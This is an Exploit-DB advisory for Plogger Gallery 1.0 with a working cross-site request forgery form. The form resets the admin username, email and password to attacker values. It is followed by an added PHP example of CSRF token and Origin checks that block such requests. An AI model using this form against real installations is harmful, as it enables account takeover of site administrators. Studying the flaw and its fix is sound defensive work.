Plogger Gallery 1.0 – Cross-Site Request Forgery (Change Admin Password)

  • Author: Or4nG.M4N
    Date: 2010-11-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15577/
  • -------------------------------------------------------------------------
    # Software: PloggerGallery Version 1.0 
    # Author: Or4nG.M4N 
    # Date: n/a
    # Dork: Forbidden 
    # Software Link : http://www.plogger.org/download/ 
    -------------------------------------------------------------------------
    +---+[CSRF Change Admin Password by OR4NG.M4N]+---+
    <html> 
    <head> 
    <title>REMOTE CSRF Change Admin Password by OR4NG.M4N</title></head> 
    <body>
    <h1>CSRF Change Admin Password by OR4NG.M4N</h1>
    <form action="http://localhost/plogger/plog-admin/plog-options.php" method="post">
    <table class="option-table" cellspacing="0">
    <tbody><tr class="alt">
    <td class="left"><label for="admin_username"></label></td>
    <td class="right"><input size="40" id="admin_username" name="admin_username" value="ro0t" type="hidden"></td>
    </tr>
    <tr>
    <td class="left"><label for="admin_email"></label></td>
    <td class="right"><input size="40" id="admin_email" name="admin_email" value="priv8te@hotmail.com" type="hidden"></td>
    </tr>
    <tr class="alt">
    <td class="left"><label for="admin_password"></label></td>
    <td class="right"><input size="40" id="admin_password" name="admin_password" value="ro0t" type="hidden"></td>
    </tr>
    <tr>
    <td class="left"><label for="confirm_admin_password"></label></td>
    <td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="ro0t" type="hidden"></td>
    </tr>
    </tbody></table>
    <td class="right"><input class="submit" name="submit" value="Change FuCKeD" type="submit"></td>
    </form>
    </body>
    </html>

    --------------------------------------------------------
    # Email - priv8te@hotmail.com
    # GreeTz 2 - i-Hmx - Demetre - SadhacKer - The injector ]
    # P0c TeaM - SarBoT511 - YoU - RGH - MY ]
    # Home - www.v4-team.com - p0c.cc - inj3ct0r.com ]
    ---------------------------------------------------------
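
A server-side check that rejects a cross-site POST like the form above, as an added example (not Plogger's code and not part of the original advisory). The helper names, the `csrf_token` field and the host `gallery.example` are assumptions, and it targets PHP 7 or later.

```php
<?php
// Added example, not Plogger code. Hypothetical helpers for a session-authenticated
// admin form such as plog-admin/plog-options.php.

function csrf_token(): string
{
    // One random token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_field(): string
{
    // Emit inside every admin <form>; a page on another origin cannot read this value.
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

function request_is_forged(array $post, array $server, string $expectedHost): bool
{
    // 1. The token must be present and equal to the session copy (constant-time compare).
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || $sent === '' || !hash_equals(csrf_token(), $sent)) {
        return true;
    }
    // 2. Defence in depth: when the browser sends Origin (or Referer), it must name our host.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source !== '' && parse_url($source, PHP_URL_HOST) !== $expectedHost) {
        return true;
    }
    return false;
}

// In the options handler, before admin_username, admin_email or admin_password is written:
session_start();
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
    && request_is_forged($_POST, $_SERVER, 'gallery.example')) { // assumed host name
    http_response_code(403);
    exit('Invalid or missing CSRF token');
}
```

The form in the advisory carries only `admin_username`, `admin_email`, `admin_password`, `confirm_admin_password` and `submit`, so it fails the first check. Requiring the current password for any credential change closes the same hole independently of the token.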